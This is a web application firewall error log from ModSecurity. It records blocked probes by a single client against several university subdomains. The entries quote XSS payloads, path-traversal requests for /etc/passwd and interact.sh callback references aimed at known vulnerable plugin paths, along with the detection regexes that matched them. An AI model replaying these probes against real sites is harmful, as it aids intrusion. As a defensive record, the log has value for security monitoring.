[Tue Aug 29 11:54:59.818614 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:service. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:service: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/login/"] [unique_id "ZO16I8Co-f0AAAqSwnEAAAAN"]
[Tue Aug 29 11:54:59.852531 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/CMSPages/GetDocLink.ashx"] [unique_id "ZO16I8Co-f0AAAqSwnIAAAAN"]
[Tue Aug 29 11:55:00.661597 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/CMSPages/GetDocLink.ashx"] [unique_id "ZO16JMCo-f0AAAqhOBsAAAAE"]
[Tue Aug 29 11:55:00.668571 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:service. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:service: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/login/"] [unique_id "ZO16JMCo-f0AAApa-KQAAAAg"]
[Tue Aug 29 11:55:02.656670 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO16JsCo-f0AAAqqtZQAAAAA"]
[Tue Aug 29 11:55:02.802209 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO16JsCo-f0AAAoz8AgAAAAS"]
[Tue Aug 29 11:55:02.825906 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO16JsCo-f0AAAqTvnYAAAAa"]
[Tue Aug 29 11:55:02.836163 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO16JsCo-f0AAAoz8AkAAAAS"]
[Tue Aug 29 11:55:02.888757 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO16JsCo-f0AAAqTvnkAAAAa"]
[Tue Aug 29 11:55:03.927922 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO16J8Co-f0AAAoAk@kAAAAC"]
[Tue Aug 29 11:55:04.179876 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO16KMCo-f0AAAqhOCsAAAAE"]
[Tue Aug 29 11:55:04.245542 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO16KMCo-f0AAAoz8BIAAAAS"]
[Tue Aug 29 11:55:04.253092 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO16KMCo-f0AAAqsV1MAAAAB"]
[Tue Aug 29 11:55:04.254554 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO16KMCo-f0AAAqRzH8AAAAM"]
[Tue Aug 29 11:55:04.531228 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-family. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-family: '/onerror='alert(document.domain)'/b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAAoz8BQAAAAS"]
[Tue Aug 29 11:55:04.531765 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-family. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-family: '/onerror='alert(document.domain)'/b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAApXgkgAAAAU"]
[Tue Aug 29 11:55:04.536906 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-family. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-family: '/onerror='alert(document.domain)'/b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAApbUbMAAAAh"]
[Tue Aug 29 11:55:04.575863 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-family. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-family: '/onerror='alert(document.domain)'/b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAAqY5@8AAAAr"]
[Tue Aug 29 11:55:04.576157 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO16KMCo-f0AAAoz8BYAAAAS"]
[Tue Aug 29 11:55:04.619339 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-family. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-family: '/onerror='alert(document.domain)'/b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAAqhODIAAAAE"]
[Tue Aug 29 11:55:04.645156 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' onerror=alert(document.domain) b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAApbUbYAAAAh"]
[Tue Aug 29 11:55:04.664534 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' onerror=alert(document.domain) b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAApbUbcAAAAh"]
[Tue Aug 29 11:55:05.535045 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO16KcCo-f0AAApXgk4AAAAU"]
[Tue Aug 29 11:55:05.591850 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' onerror=alert(document.domain) b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KcCo-f0AAApa-LMAAAAg"]
[Tue Aug 29 11:55:05.622734 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' onerror=alert(document.domain) b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KcCo-f0AAAqsV1wAAAAB"]
[Tue Aug 29 11:55:05.675640 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' accesskey='x' onclick='alert(document.domain)' class='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KcCo-f0AAApHRcMAAAAP"]
[Tue Aug 29 11:55:05.796339 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' onerror=alert(document.domain) b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KcCo-f0AAApa-LgAAAAg"]
[Tue Aug 29 11:55:05.979739 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO16KcCo-f0AAAqRzI0AAAAM"]
[Tue Aug 29 11:55:06.036459 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' accesskey='x' onclick='alert(document.domain)' class='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KsCo-f0AAApHRcoAAAAP"]
[Tue Aug 29 11:55:06.062521 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO16KsCo-f0AAApXglYAAAAU"]
[Tue Aug 29 11:55:06.084868 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO16KsCo-f0AAApHRcwAAAAP"]
[Tue Aug 29 11:55:06.087922 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO16KsCo-f0AAAqRzJAAAAAM"]
[Tue Aug 29 11:55:06.106464 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO16KsCo-f0AAApbUboAAAAh"]
